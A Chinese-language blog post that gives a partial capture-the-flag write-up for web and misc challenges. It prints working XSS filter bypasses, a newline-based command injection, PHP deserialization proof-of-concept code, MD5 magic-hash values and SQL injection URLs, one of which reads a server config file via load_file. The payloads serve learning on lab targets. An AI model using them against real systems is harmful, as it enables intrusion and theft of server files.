<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
<link href="//cdn.bootcss.com/pace/1.0.2/themes/pink/pace-theme-flash.css" rel="stylesheet">
<style>
    .pace .pace-progress {
        background: #1E92FB; /*进度条颜色*/
        height: 3px;
    }
    .pace .pace-progress-inner {
         box-shadow: 0 0 10px #1E92FB, 0 0 5px     #1E92FB; /*阴影颜色*/
    }
    .pace .pace-activity {
        border-top-color: #1E92FB;    /*上边框颜色*/
        border-left-color: #1E92FB;    /*左边框颜色*/
    }
</style>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Write Up," />





  <link rel="alternate" href="/atom.xml" title="spira1" type="application/atom+xml" />






<meta name="description" content="Webxxxxxxxx：直接插：1&amp;lt;script&amp;gt;alert(123)&amp;lt;/script&amp;gt; 查看源码,于是构造：1”&amp;gt;&amp;lt;script&amp;gt;alert(123)&amp;lt;/script&amp;gt; 成功弹窗 xxxxxxxxxx:直接插：1&amp;lt;script&amp;gt;alert(123)&amp;lt;/script&amp;gt; 查看源码： 看来script关键字被过滤了，最喜欢这">
<meta name="keywords" content="Write Up">
<meta property="og:type" content="article">
<meta property="og:title" content="道格平台部分WP">
<meta property="og:url" content="http://eagerseven.cn/2017/09/26/Dog3_wp/index.html">
<meta property="og:site_name" content="spira1">
<meta property="og:description" content="Webxxxxxxxx：直接插：1&amp;lt;script&amp;gt;alert(123)&amp;lt;/script&amp;gt; 查看源码,于是构造：1”&amp;gt;&amp;lt;script&amp;gt;alert(123)&amp;lt;/script&amp;gt; 成功弹窗 xxxxxxxxxx:直接插：1&amp;lt;script&amp;gt;alert(123)&amp;lt;/script&amp;gt; 查看源码： 看来script关键字被过滤了，最喜欢这">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://eagerseven.cn/images/9.png">
<meta property="og:updated_time" content="2018-10-31T11:54:03.520Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="道格平台部分WP">
<meta name="twitter:description" content="Webxxxxxxxx：直接插：1&amp;lt;script&amp;gt;alert(123)&amp;lt;/script&amp;gt; 查看源码,于是构造：1”&amp;gt;&amp;lt;script&amp;gt;alert(123)&amp;lt;/script&amp;gt; 成功弹窗 xxxxxxxxxx:直接插：1&amp;lt;script&amp;gt;alert(123)&amp;lt;/script&amp;gt; 查看源码： 看来script关键字被过滤了，最喜欢这">
<meta name="twitter:image" content="http://eagerseven.cn/images/9.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://eagerseven.cn/2017/09/26/Dog3_wp/"/>





  <title>道格平台部分WP | spira1</title>
  








</head>

<script type="text/javascript" src="/lib/clipboard/clipboard.js"></script>
<script type="text/javascript" src="/js/src/custom.js"></script>



   <canvas class="fireworks" style="position: fixed;left: 0;top: 0;z-index: 1; pointer-events: none;" ></canvas> 
   <script type="text/javascript" src="//cdn.bootcss.com/animejs/2.2.0/anime.min.js"></script> 



<div id="hexo-helper-live2d">
  <canvas id="live2dcanvas" width="150" height="300"></canvas>
</div>
<style>
  #live2dcanvas{
    position: fixed;
    width: 150px;
    height: 300px;
    opacity:0.7;
    right: 0px;
    z-index: 999;
    pointer-events: none;
    bottom: -20px;
  }
</style>
<script type="text/javascript" src="/live2d/device.min.js"></script>
<script type="text/javascript">
const loadScript = function loadScript(c,b){var a=document.createElement("script");a.type="text/javascript";"undefined"!=typeof b&&(a.readyState?a.onreadystatechange=function(){if("loaded"==a.readyState||"complete"==a.readyState)a.onreadystatechange=null,b()}:a.onload=function(){b()});a.src=c;document.body.appendChild(a)};
(function(){
  if((typeof(device) != 'undefined') && (device.mobile())){
    var trElement = document.getElementById('hexo-helper-live2d');
    trElement.parentNode.removeChild(trElement);
    return;
  }else
    if (typeof(device) === 'undefined') console.error('Cannot find current-device script.');
  loadScript("/live2d/script.js", function(){loadlive2d("live2dcanvas", "/live2d/assets/hijiki.model.json", 0.5);});
})();
</script>


<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">spira1</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-music"></i> <br />
            
            Music
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="Searching..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://eagerseven.cn/2017/09/26/Dog3_wp/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="spira1">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="spira1">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">道格平台部分WP</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2017-09-26T13:03:00+08:00">
                2017-09-26
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Words count in article&#58;</span>
                
                <span title="Words count in article">
                  1,357
                </span>
              

              

              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h2><h3 id="xxxxxxxx："><a href="#xxxxxxxx：" class="headerlink" title="xxxxxxxx："></a>xxxxxxxx：</h3><p>直接插：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(123)&lt;/script&gt;</span><br></pre></td></tr></table></figure></p>
<p>查看源码,<br>于是构造：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">”&gt;&lt;script&gt;alert(123)&lt;/script&gt;</span><br></pre></td></tr></table></figure></p>
<p>成功弹窗</p>
<h3 id="xxxxxxxxxx"><a href="#xxxxxxxxxx" class="headerlink" title="xxxxxxxxxx:"></a>xxxxxxxxxx:</h3><p>直接插：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(123)&lt;/script&gt;</span><br></pre></td></tr></table></figure></p>
<p>查看源码：<br><img src="/images/9.png" alt="“源码”"></p>
<p>看来script关键字被过滤了，最喜欢这种直接转义成空的过滤</p>
<p>于是双写绕过：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">”&gt;&lt;scrscriptipt&gt;alert(123)&lt;/scrscriptipt&gt;</span><br></pre></td></tr></table></figure></p>
<p>成功弹窗</p>
<h3 id="exec1："><a href="#exec1：" class="headerlink" title="exec1："></a>exec1：</h3><p>题目提示swp，于是想到源码泄露，用御剑扫出了.swpm。<br>然后访问得到index.php.swp文件，用winhex打开，在下面有源码。<br>整理后发现?&gt;在上面，&lt;?php在下面，于是推测是反过来了的，最后整理得到源码。<br>源码看着很眼熟，想起是dvwa里的命令注入源码，于是构造:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?ip=127.0.0.1|net user</span><br></pre></td></tr></table></figure></p>
<p>结果不行，仔细看和dvwa很像，但是这道题把管道符给过滤了.<br>后来在网上看到可以用%0a绕过，于是构造<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?ip=127.0.0.1%0als</span><br></pre></td></tr></table></figure></p>
<p>得到flag.php和index.php两个文件，构造<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?ip=127.0.0.1%0a index.php</span><br></pre></td></tr></table></figure></p>
<p>发现和之前得到的swp文件是一致的，再访问flag.php发现什么都没有<br>窝草，纠结了很久，点了下查看源码….</p>
<h3 id="Burp："><a href="#Burp：" class="headerlink" title="Burp："></a>Burp：</h3><p>直接将后三位加$$进行爆破，其实一开始思路都对了，也做出来了，结果把返回长度997填上去，怎么都不对，今天才发现，心态爆炸。</p>
<h3 id="我们分手了："><a href="#我们分手了：" class="headerlink" title="我们分手了："></a>我们分手了：</h3><p>一看是序列化的题。构造poc：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class just4fun &#123;</span><br><span class="line">	public $filename;</span><br><span class="line">	function __toString() &#123;</span><br><span class="line">	return @file_get_contents($this-&gt;filename);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">$i = new just4fun();</span><br><span class="line">$i-&gt;filename = ‘13579flag.php’;</span><br><span class="line">var_dump(serialize($i));</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
<p>得到的值为：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">string(55) “O:8:”just4fun”:1:&#123;s:8:”filename”;s:13:”13579flag.php”;&#125;”</span><br></pre></td></tr></table></figure></p>
<p>于是构造url：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">audit_4.ph0rse.me/?data=O:8:”just4fun”:1:&#123;s:8:”filename”;s:13:”13579flag.php”;&#125;</span><br></pre></td></tr></table></figure></p>
<p>但是还是不对，再看一遍代码，撞正则枪口上了，谷歌一下，找了挺久一个博客上说可以用+来绕过：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">audit_4.ph0rse.me/?data=O:+8:”just4fun”:1:&#123;s:8:”filename”;s:13:”13579flag.php”;&#125;</span><br></pre></td></tr></table></figure></p>
<p>为什么还是不对！然后问了下大佬，+号url编码就过了，做题还是不够细致</p>
<h3 id="SYB1："><a href="#SYB1：" class="headerlink" title="SYB1："></a>SYB1：</h3><p>根据提示构造SYB.php.bak得到备份文件。<br>源码主要是说key关键字会被转义成空，最喜欢转义成空的了<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">md5($key1) == md5($key2) &amp;&amp; $key1 !== $key2</span><br></pre></td></tr></table></figure></p>
<p>这段代码自然要拿出我珍藏的两个0e漏洞的值了：s878926199a和s155964671a，构造url：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://118.89.167.246:2501/SYB.php?kkeyey1=s878926199a&amp;kekeyy2=s155964671a</span><br></pre></td></tr></table></figure></p>
<h3 id="sql："><a href="#sql：" class="headerlink" title="sql："></a>sql：</h3><p>点开链接就是源码，简单分析下：先get一个id参数，好吧感觉没啥好说的，或者不知道怎么说。<br>默认是debug=1，肯定要改成?id=1,回显hello admin，玛德我都是admin了还不给我flag？<br>开玩笑开玩笑。再试试id=2，返回一个字符串，是ip，还有句nothing here。估计这是死路。<br>构造<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1 and 1=1</span><br></pre></td></tr></table></figure></p>
<p>返回正常。再构造1=2，返回错误，说明此处存在sql注入。<br>构造<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1 and 1=1 order by 1–+</span><br></pre></td></tr></table></figure></p>
<p>测试字段数，测试结果表明只有一个字段。构造<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1 and 1=1 union select 1–+</span><br></pre></td></tr></table></figure></p>
<p>窝草没反应<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">？id=-1 and 1=1 union select 1–+</span><br></pre></td></tr></table></figure></p>
<p>有了有了，老套路，最后得flag。<br>窝草！我就知道没这么简单！出题人在哪！<br>顿时没了思路，询问了下大佬，大佬只回复我：<br>你看第一个查询和第二个查询之间多了点东西，总不会白多吧。<br>于是想到可以加个if条件判断，尝试了几次，最后发现用127.0.0.1的ip不行，要将ip改掉（任意），正确payload：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://118.89.167.246:4001/?id=if((select%20ip%20from%20logs%20where%20ip=%27127.0.0.2%27%20limit%201),1,2)–+</span><br></pre></td></tr></table></figure></p>
<p>同时在抓的包里要将x-forwarded-for改为：127.0.0.2。<br>（补充，昨晚做出来以后，今天发现同样的做法不能注出flag了，试了几次发现，每次payload的ip不能是以前注入时用过的，否则不能注入成功）</p>
<p>附上大佬的payload，直接读取文件：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1 and 1=2 union select load_file(‘/var/www/html/config.php’)#</span><br></pre></td></tr></table></figure></p>
<h3 id="一个有故事的人："><a href="#一个有故事的人：" class="headerlink" title="一个有故事的人："></a>一个有故事的人：</h3><p>反序列化，只要满足<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$o-&gt;secret === $o-&gt;enter</span><br></pre></td></tr></table></figure></p>
<p>就能得到flag，一开始构造poc：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class just4fun &#123;</span><br><span class="line">var $enter;</span><br><span class="line">var $secret;</span><br><span class="line">&#125;</span><br><span class="line">$i = new just4fun();</span><br><span class="line">$i-&gt;enter = $i-&gt;secret;</span><br><span class="line">var_dump(serialize($i));</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
<p>但是不对，试了几次都不行，再想到题目提示有取地址符，那么secret和enter就能指向同一个变量，也能满足if条件，于是改为：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&amp;$j-&gt;enter = $j-&gt;secret;</span><br></pre></td></tr></table></figure></p>
<p>报错，笑死我了，去地址符怎么可能这样用，最终版：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class just4fun &#123;</span><br><span class="line">var $enter;</span><br><span class="line">var $secret;</span><br><span class="line">&#125;</span><br><span class="line">$i = new just4fun();</span><br><span class="line">$i-&gt;enter = &amp;$i-&gt;secret;</span><br><span class="line">var_dump(serialize($i));</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
<p>结合上一道序列化的题以及以前遇到过的题，感觉两者各自构造的poc的方式都是类似的，像是模板一样，也可能是我现阶段做的题还太简单</p>
<h3 id="暴走XSS："><a href="#暴走XSS：" class="headerlink" title="暴走XSS："></a>暴走XSS：</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://eagerseven.cn/2017/09/26/Baozou_XSS/</span><br></pre></td></tr></table></figure>
<h2 id="MISC"><a href="#MISC" class="headerlink" title="MISC:"></a>MISC:</h2><h3 id="misc-1："><a href="#misc-1：" class="headerlink" title="misc_1："></a>misc_1：</h3><p>直接改后缀为zip，打开得flag</p>
<h3 id="hooooop："><a href="#hooooop：" class="headerlink" title="hooooop："></a>hooooop：</h3><p>看了好久好久，又去搜了下常规加密方式，感觉和猪圈密码最像。<br>也试了很多次，因为A和J，H和Q有异议，所以得试很多次，而且最坑爹的是小写！得到正确flag</p>
<h3 id="misc-2："><a href="#misc-2：" class="headerlink" title="misc_2："></a>misc_2：</h3><p>txt文件里提示了明文攻击，于是扔到ARCHPR里，将txt文件压缩，再把压缩的txt和加密文件拖进去就行了</p>
<h3 id="The-emoji-system："><a href="#The-emoji-system：" class="headerlink" title="The emoji system："></a>The emoji system：</h3><pre><code>
</code></pre>
      
    </div>
    
    
    

    

    
      <div>
        <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">----------------------这是我的底线-----------------------</div>
    
</div>

      </div>
    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Write-Up/" rel="tag"><i class="fa fa-tag"></i> Write Up</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/09/26/Baozou_XSS/" rel="prev" title="暴走XSS">
                暴走XSS <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">spira1</p>
              <p class="site-description motion-element" itemprop="description">路还很长，我的目标是星辰大海</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">76</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">48</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="mailto:eagerseven@gmail.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Web"><span class="nav-number">1.</span> <span class="nav-text">Web</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#xxxxxxxx："><span class="nav-number">1.1.</span> <span class="nav-text">xxxxxxxx：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#xxxxxxxxxx"><span class="nav-number">1.2.</span> <span class="nav-text">xxxxxxxxxx:</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#exec1："><span class="nav-number">1.3.</span> <span class="nav-text">exec1：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Burp："><span class="nav-number">1.4.</span> <span class="nav-text">Burp：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#我们分手了："><span class="nav-number">1.5.</span> <span class="nav-text">我们分手了：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SYB1："><span class="nav-number">1.6.</span> <span class="nav-text">SYB1：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sql："><span class="nav-number">1.7.</span> <span class="nav-text">sql：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#一个有故事的人："><span class="nav-number">1.8.</span> <span class="nav-text">一个有故事的人：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#暴走XSS："><span class="nav-number">1.9.</span> <span class="nav-text">暴走XSS：</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#MISC"><span class="nav-number">2.</span> <span class="nav-text">MISC:</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#misc-1："><span class="nav-number">2.1.</span> <span class="nav-text">misc_1：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#hooooop："><span class="nav-number">2.2.</span> <span class="nav-text">hooooop：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#misc-2："><span class="nav-number">2.3.</span> <span class="nav-text">misc_2：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#The-emoji-system："><span class="nav-number">2.4.</span> <span class="nav-text">The emoji system：</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>



        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">spira1</span>

  
</div>
<!--

  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>

-->


        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
          <span id="scrollpercent"><span>0</span>%</span>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
